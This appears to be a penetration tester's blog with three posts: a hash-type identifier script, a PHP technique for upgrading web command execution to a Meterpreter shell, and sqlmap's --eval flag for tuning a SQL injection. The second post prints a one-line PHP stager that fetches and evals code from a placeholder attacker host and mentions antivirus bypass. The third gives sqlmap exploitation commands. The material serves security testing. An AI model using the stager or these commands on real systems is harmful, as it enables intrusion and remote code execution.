Thursday, January 8, 2015

Password Hash Identifier

So I recently saw KoreLogic post a link to a password hash dump on pastebin located here: http://pastebin.com/A3JSbdzm

It was not a typical hash dump as it was not cracked or uncracked hashes, but hash types followed by examples. When faced with a funky password hash, I typically call upon john the ripper to do identification for me, however I have been in multiple scenarios where it is either unclear or john cannot identify the hash(es) I have. This pastebin dump was the kick in the pants I needed to write a tool of my own that attempts to identify the hash type of a given hash.

If an exact match cannot be found, the script will give you "possible" matches. I have incorporated the hash types mentioned above as well as the list from the hashcat site here: http://hashcat.net/wiki/doku.php?id=example_hashes

To use it you will need to download the python script and the associated hash list.

https://github.com/jakxx/Scripts/blob/master/hashes.py
https://github.com/jakxx/Scripts/blob/master/hashes.txt

Once you have them, usage is simple:

python hashes.py '[hash]'

An example can be seen below.


Cheers.

Friday, February 21, 2014

PHP Meterpreter Web Delivery

I recently found myself in a situation where I had command execution through a web application and but wanted to upgrade to a reverse shell that included Meterpreter functionality. I had two roadblocks as I needed to bypass antivirus and some of the local exe's were locked down, such as powershell (sadface), net commands, ipconfig, etc. (sidenote: shoutout to Chris (@obscuresec) for some great ideas on getting around locked down files)

After some research I was able to establish a simple PHP command and control-type scenario where the server would reach out to me and execute whatever code I specified on my attacking machine using a combination of eval and file_get_contents. This way it left a very small footprint (one line) on the target machine and I was able to execute larger blocks of code as my initial command execution bug was limited by length. The PHP code went something like this:

<?php eval(file_get_contents('http://attacker/boom.txt'); ?>

This way I had no size limitations and had access to all the functionality of PHP, which is quite a bit. I ended up enumerating the internal network using PHP to do things like scan ports, grab internal web pages, etc.

All this to say, it got me thinking and after a quick refresher, I dove back into ruby world to try to hack together a metasploit module that will automate this and provide the elusive meterpreter. The super flexible, ninja module structure credit goes to Ben Campbell (@meatballs__).

Simply configure the options



..and execute the printed command on the targeted system



Update*
I have added support for python and combined this module with the psh_web_delivery module. The resulting module has been merged into the metasploit framework. You can find the module here.

Friday, January 17, 2014

Using SQLMAP's Eval Functionality for Successful Exploitation

Recently I was performing a web application assessment and ran across a SQL injection bug. This bug was verified by two different tools and one of those tools was even able to pull back the database name, but nothing else. As usual, I turned to my favorite SQLi exploitation tool, SQLMAP.

After spending a while trying to get SQLMAP to find the injection being specific as I could and increasing the level flag, I began to realize that I was going to need to customize some parts of the requests. I eventually located the issue, being that a successful injection required a %09 (URL encoded version of a tab) instead of a %20 (URL encoded version of a space).

It is for this very type of scenario that SQLMAP implements the --eval flag, allowing the user to execute any python code at run-time before each request is sent. All you need to do is reference the parameter that you want to modify, such as "id", etc. The example in the wiki located here illustrates the proper syntax:
--eval="import hashlib;id2=hashlib.md5(id).hexdigest()"
In this instance they are setting "id2" parameter to the MD5 value of the "id" parameter.

Keeping this awesome feature in mind, I decided to use pythons replace() method to modify the space characters (%20) and replace them with tab characters (%09). We will also need to escape quotes so that we do not terminate the eval parameter.

My initial attack went something like this:
./sqlmap.py -l bob.txt -p email --eval="email=email.replace(\"%20\",\"%09\",15)" -v 5
This attack, however, still failed as the requests were still using the %20 as the space character instead of the %09.

After some digging through the source code, it was apparent that I would need to use the actual space character " " instead of its URL-encoded represetatation:
 ./sqlmap.py -l bob.txt -p email --eval="email=email.replace(\" \",\"%09\",15)" -v 5
This time I saw that the requests were being successfully modified and was greeted with the pretty green text:


This just shows one possible use for this super powerful flag within SQLMAP, and another reason why the tool is only as good as the tester using it, as this was the difference between a relatively* successful and unsuccessful exploitation.

* I say relatively because I ended up enumerating the username manually so i didnt technically need SQLMAP, but a tool like SQLMAP just makes extracting data SO much faster.